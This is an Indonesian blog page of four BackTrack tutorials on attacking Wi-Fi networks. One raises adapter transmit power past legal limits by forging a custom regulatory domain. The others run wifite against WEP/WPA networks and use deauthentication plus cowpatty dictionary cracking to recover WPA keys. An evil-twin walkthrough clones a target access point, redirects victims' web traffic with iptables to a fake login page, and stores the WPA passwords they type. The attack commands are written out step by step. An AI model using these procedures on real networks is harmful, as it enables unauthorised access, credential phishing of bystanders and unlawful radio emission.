Tampilkan postingan dengan label wireless. Tampilkan semua postingan
Tampilkan postingan dengan label wireless. Tampilkan semua postingan

Rabu, 18 April 2012

Menaikan power usb wifi adapter up to 2Watt

kita sekarang bahas naikin power usb wifi adapter up to 2Watt. tutorial ini menggunakan contoh RT2870/RT3070 Wireless Adapter, dimana yang pake chipset Ralink ini banyak sekali, salah satu nya alfa hijau AWUS036H.

Update Driver Default Backtrack
pertama, kita update dulu driver default bawaan live cd backtrack, kenapa mesti update? biasalah live cd, enggak stabil diurusan driver, karena pas developer build live cd itu di satu hardware, sementara kalo udah sampe ke tangan user yang berbagai macam jenis hardware, masalahnya udah beda / bakal tambah masalah ini lah itu lah, jadi lebih baik kita update driver setelah install live cd backtrack.
01root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
02root@bt:~# cd/usr/src/
04root@bt:~# tar jxpf compat-wireless-2011-07-14.tar.bz2
06root@bt:~# tar xpf 2.6.39.patches.tar
07root@bt:~# cd compat-wireless-2012-01-22
08root@bt:~# patch -p1 < ../patches/mac80211-2.6.29-fix-tx-ctl-no-ack-retry-count.patch
09root@bt:~# patch -p1 < ../patches/mac80211.compat08082009.wl_frag+ack_v1.patch
10root@bt:~# patch -p1 < ../patches/zd1211rw-2.6.28.patch
11root@bt:~# patch -p1 < ../patches/ipw2200-inject.2.6.36.patch
12root@bt:~# make
13root@bt:~# make install
14root@bt:~# reboot
Update Wireless Regulatory Database
sekarang kita langsung update dan edit Wireless Reg Database, yang secara default di backtrack 5 - r1 masih ikut kernel biasa (ubuntu), entah kenapa sama developer backtrack ini enggak di edit.
2root@bt:~# tar -jxf wireless-regdb-2011.04.28.tar.bz2
3root@bt:~# cd wireless-regdb-2011.04.28
edit db.txt, lalu tambahin country XX di baris paling bawah, tambahin line seperti ini:
1root@bt:~/wireless-regdb-2011.04.28# nano db.txt
2 
3#kita akan buat negara baru, yaitu negara XX, negara bebas, sesuai user, tidak terpaku atas XX
4#kita juga akan membuat semua adapter yang bekerja pada 2.4 GHz, dan 5 GHz bisa di power up kan.
5#tambahin line dipaling bawah, seperti ini :
6 
7country XX:
8        (2402 - 2492 @ 35), (N/A, 35)
9        (4910 - 5835 @ 35), (N/A, 35)
setelah itu install dependencies yang dibutuhkan untuk compile make, yaitu python-m2crypto
1root@bt:~/wireless-regdb-2011.04.28# apt-get install python-m2crypto
lalu langsung compile (make)
1root@bt:~/wireless-regdb-2011.04.28# make
2Generating regulatory.bin digitally signed by root...
3./db2bin.py regulatory.bin db.txt ~/.wireless-regdb-root.key.priv.pem
4sha1sum db.txt > sha1sum.txt
setelah selesai make, seperti diatas, lalu hasil dari make, yaitu regulatory.bin, kita copy paste ke CRDA.
1root@bt:~/wireless-regdb-2011.04.28# cp regulatory.bin /usr/lib/crda/
setelah itu kita upgrade CRDA ke versi paling baru selain untuk install ulang CRDA dengan custom Regulatory yang kita buat diatas.
2root@bt:~/# tar -xvjf crda-1.1.2.tar.bz2
3root@bt:~/# cd crda-1.1.2
copy pub key yang kita udah generate tadi lewat make diatas.
1root@bt:~/crda-1.1.2# cp ~/wireless-regdb-2011.04.28/root.key.pub.pem pubkeys/
install dependencies untuk make selanjutnya.
1root@bt:~/crda-1.1.2# apt-get install libnl-dev
setelah itu make, dan make install.
1root@bt:~/crda-1.1.2# make
2root@bt:~/crda-1.1.2# make install
lalu reboot,
Negara Baru XX, regulatory 35dBm (2000 mW)
setelah reboot, set regulatory di negara XX (yang diatas tadi kita buat).
1root@bt:~# iw reg set XX
hasil :
01root@bt:~# iw list |grep 35
02        Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
03            * 2412 MHz [1] (35.0 dBm)
04            * 2417 MHz [2] (35.0 dBm)
05            * 2422 MHz [3] (35.0 dBm)
06            * 2427 MHz [4] (35.0 dBm)
07            * 2432 MHz [5] (35.0 dBm)
08            * 2437 MHz [6] (35.0 dBm)
09            * 2442 MHz [7] (35.0 dBm)
10            * 2447 MHz [8] (35.0 dBm)
11            * 2452 MHz [9] (35.0 dBm)
12            * 2457 MHz [10] (35.0 dBm)
13            * 2462 MHz [11] (35.0 dBm)
14            * 2467 MHz [12] (35.0 dBm)
15            * 2472 MHz [13] (35.0 dBm)

Good Luck! ;p

Wifite.py for wifi cracking

ane mau share tools yang ane temukan ini.. namanya wifite dibuat dengan bahasa python, tools ini digunakan untuk hacking WEP/WPA
dari pada lama2,, bikin otak pusing langsung kita review yuk
tools ini bisa 2 mode lo.. console and GUI cool dech

console
http://wifite.googlecode.com/files/snapshot.png


GUI
[Image: snapshot-gui-r39.png]


first download filenya..

# wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py

Setelah kita download selanjutnya ganti hak akses filenya

# chmod u+x wifite.py

run,,,

# python wifite.py

selanjutnya adalah pengembangannya command dasarnya

cracking semua WEP access point gunakan command

# ./wifite.py -all -nowpa

AP dengan kekuatan signal 50 keats

# ./wifite.py -p 50 -nowpa

menggunakan pasword lis kita

# ./wifite.py -all --dict /directory file kita

kalau untuk darkc0de pakai ini

# ./wifite.py -all --dict /pentest/passwords/wordlists/darkc0de.lst

udah itu aja ya reviewnya
ini program open source koq,,

referensi

http://code.google.com/p/wifite/

Senin, 19 Maret 2012

hacking wpa/wpa2 tanpa wordlist/bruteforce

Inti dari trik ini adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan “salah konek” atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data. Bagaimana attacker melakukannya ? baik kita mulai

1. Mempersiapkan fakelogin AP
Untuk contoh kali ini saya telah mengupload contoh halaman login akses point palsu di ftp.indonesianbacktrack.or.id , teman-teman bisa mendownloadnya di sana.
A. Membuat database
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,
/etc/init.d/mysql start

B. FakeLogin
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.
root@eichel:/var/www# ls -al
 total 84
 drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 .
 drwxr-xr-x 15 root root 4096 2011-05-10 22:56 ..
 -rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html
 -rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif
 -rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html
 -rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin
 -rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php
 -rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html
 -rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css
 -rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif
Jika sudah jalankan service apache kita “/etc/init.d/apache2 start” kemudian buka localhost atau dengan ip local kita pada browser.

Okey semua yang kita butuhkan sudah siap , kemudian seperti yang sudah saya singgung di atas, attacker akan membuat sebuah AP palsu yang hampir sama dengan AP Target.
2. FakeAP
A. Information Gathering
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai

Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan “airodump-ng [interface-monitor]” untuk mengambil informasi AP Target.

B. Dhclient Server
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.

Uppz ada keterangan fail disitu .. itu dikarenakan setingan file konfigurasi pada dhcp3-server belum di konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu file konfigurasi default sebelum membuat file konfigurasi yang kita inginkan.
root@eichel:/var/www# mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,
root@eichel:/var/www# kwrite /etc/dhcp3/dhcpd.conf
Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.
ddns-update-style ad-hoc;
 default-lease-time 600;
 max-lease-time 7200;
 subnet 192.168.2.128 netmask 255.255.255.128 {
 option subnet-mask 255.255.255.128;
 option broadcast-address 192.168.2.255;
 option routers 192.168.2.129;
 option domain-name-servers 8.8.8.8;
 range 192.168.2.130 192.168.2.140;
 }
Konfigurasi di atas sebenarnya merupakan konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya. Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.
C. Airbase-ng
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama
root@eichel:~# airmon-ng stop mon0
 Interface Chipset Driver
 mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed)
 wlan1 Ralink 2573 USB rt73usb - [phy2]
 wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@eichel:~# airmon-ng stop wlan0
 Interface Chipset Driver
 wlan1 Ralink 2573 USB rt73usb - [phy2]
 wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
 (monitor mode disabled)
Jika sudah sesuai dengan channel AP target ( dalam kasus ini 11 – lihat pada tahap information gathering ) , kita memulai airmon-ng pada channel 11.

Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil “information gathering” dengan airodump untuk mengecoh client.
syntaxnya : airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]

Kemudian perhatikan output pada perintah airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan menciptakan sebuah interface baru yaitu “at0″ dimana nantinya interface at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service dhcp3-server.

3. IPtables
Setelah semuanya berhasil dengan baik, harapan attacker adalah client terkecoh ketika mengakses fakeAP yang telah di buat sebelumnya, maka attacker berharap agar client mengira bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi authentifikasi pada browser. yaitu pada index fakelogin yang telah kita siapkan pada server apache/httpd pada localhost kita. Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi masalah lagi, tapi bagaimana agar client mengakses localhost kita yang menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url yang dimasukan client pada browser ( port 80 ) menuju kepada localhost kita. Misalnya client mengakses google.com maka browser akan mengarahkannya terlebih dahulu ke file pada localhost apache kita.
A. Menghapus semua setingan IPtables.
Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll
root@eichel:~# iptables --flush
 root@eichel:~# iptables --table nat --flush
 root@eichel:~# iptables --delete-chain
 root@eichel:~# iptables --table nat --delete-chain
B.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT
Kemudian lanjutkan dengan mengaktifkan ip_forward
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward
C. Redirect semua permintaan pada port 80
Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
 inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0
 inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
 RX packets:99424 errors:0 dropped:0 overruns:0 frame:0
 TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB)
 Interrupt:43
Okey seperti ouput di atas agaknya saya menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda dengan akses point target. Hmm jgn bingung dengan hal ini karena ada kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet ip pada tiap2 AP yang terdapat dalam satu jaringan.
root@eichel:~#iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.13:80
root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE
4. Deauthentifikasi
Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya

Perhatikan pada tab terminal airbase-ng
okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP

Client Target side
Mari kita mengintip sebentar proses pada client
Client pada percobaan kali ini memakai sistem operasi windows 7 , anggap saja client masih terkonek dengan AP asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk

Kemudian keadaan koneksi ke AP pada saat serangan deauth

Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik

Anggap client terpancing untuk mengisi password wpa


5. Melihat hasil
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database

Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..
sumber : http://technicdynamic.com/2011/12/hacking-wpa-2-key-evil-twin-no-bruteforce/

Rabu, 14 Maret 2012

hacking wireless wpa dan wp demgan cowpatty

backtrackers dimanapun anda berada kali ini saya akan membahas mengenai cara melakukan crack wiffi dengan cowpatty , hmm sebenarnya langkah-langkah untuk hacking wireless wpa dan wpe sudah banyak di bahas baik di blog ini maupun di forum. Karena itu saya coba untuk menjabarkannya perlahan di mulai dari serangan awal saja agar lebih di mengerti

1. Cek Support Interface

langkah pertama tentu saja kita membutuhkan interface wireless yang support terhadap mode monitor
cek kompetibilitas wireless
root@nindya-putri:~# airmon-ng
sip dilihat dari hasil di atas berarti interface wireless berbasis pada wlan0 telah support dengan mode monitor .. syarat 1 sukses ..

2.MODE MONITOR

Selanjutnya kita mengaktifkan mode monitor pada wlan0 …
root@nindya-putri:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 – [phy0]
(monitor mode enabled on mon0)
Ok kita telah sukses sejauh ini , output pada terminal menunjukan bahwa monitor mode telah di aktifkan pada interface mon0
3. Berikutnya Kita harus menangkap (dump) traffik pada akses point target dan lalu lintas paket data antara AP dan client yang sedang terkoneksi , sebelumnya saya melakukan information gathering untuk mengetahui beberapa spesifikasi target yang di butuhkan
root@nindya-putri:~# airodump-ng mon0
Ok yang perlu kita catat dari pengumpulan informasi data yang di perlukan adalah ( dalam kasus saya )
a. bssid AP = 00:1E:C1:4C:BF:F8
b. channel = 11
c. ENC = WPA
d. SSID = ibteam-3g

4. AIRODUMP-NG

Selanjutnya saya melakukan dump trafik data antara client terkonek dan Akses point (AP)
root@nindya-putri:~# airodump-ng --bssid 00:1E:C1:4C:BF:F8 -w dump_traf1 -c 11 mon0
saya jelaskan sedikit mengenai -w dump_traf1 ..parameter ini berfungsi untuk membuat suatu file hasil capture dan dump trafik tadi, dump_traf1 adalah nama file yang saya pilih anda bebas memilih nama lain sesuka hati anda. Dan file tersebut nantinya akan berekstension .cap. Tentu saja file tersebut akan di buat pada lokasi direktori dimana anda memulai perintah airodump.

5. Handshake

Tujuan kita dalam capturing ini sebenarnya adalah mencari handshake. Untuk mendapatkan nilai handshake kita harus mendiskoneksikan client yang sudah terkoneksi dengan baik ke AP target. ok saya tertarik pada client yang telah terkoneksi dengan AP dengan ssid ( ibteam-3g ) dengan bssid F4:EC:38:99:60:F3. Kita gunakan fasilitas aireply untuk melakukan deauth attack.
root@nindya-putri:~# aireplay-ng --deauth 1 -a 00:1E:C1:4C:BF:F8 -c F4:EC:38:99:60:F3 mon0
ok perhatikan pada gambar di bawah ini , bahwa setelah aireplay-ng di esekusi kita mendapatkan handshake .. karena dalam keadaan terenskripsi , time to crack it !!

6. cowpatty action

Ok kita sudah di pastikan mendapat file capture handshake yang tersimpan pada direktori di mana anda memulai capturing dengan airodump tadi. masih ingatkan tadi saya simpan dengan nama dump_traf1 akan tersimpan otomatis dengan nama dump_traff1-01.cap.
Untuk melakukan crack kita membutuhkan file hash (genpmk)
root@nindya-putri:~# genpmk -f pass.txt -d tes_genpmk_hash_wpa -s ibteam-3g -v
oh iya jgn lupa bahwa anda membutuhkan password list (dictionary) .. yang nantinya menjadi nilai dari parameter -f. Pada kasus saya kali ini saya telah menyiapkan password list dalam folder yang sama.saatnya kita mengolah file-file baik hasil capture, hashing dan password list dengan cowpatty
cowpatty -s ibteam-3g -f pass.txt -d tes_genpmk_hash_wpa -r dump_traf1-01.cap -v,
dimana parameternya
 -s ( ssid AP target )
 -f ( lokasi file password list dictionary )
 -d ( hasil hashing password list dictionary dengan genpmk )
 -r ( hasil capturing handshadke dengan airdump )
 -v ( verbose output )
ok kita lihat sebenarnya hal tersebut tidaklah sesulit yang anda duga. pada gambar sudah tampak hasil cracking enskripsi wpa dari cowpatty.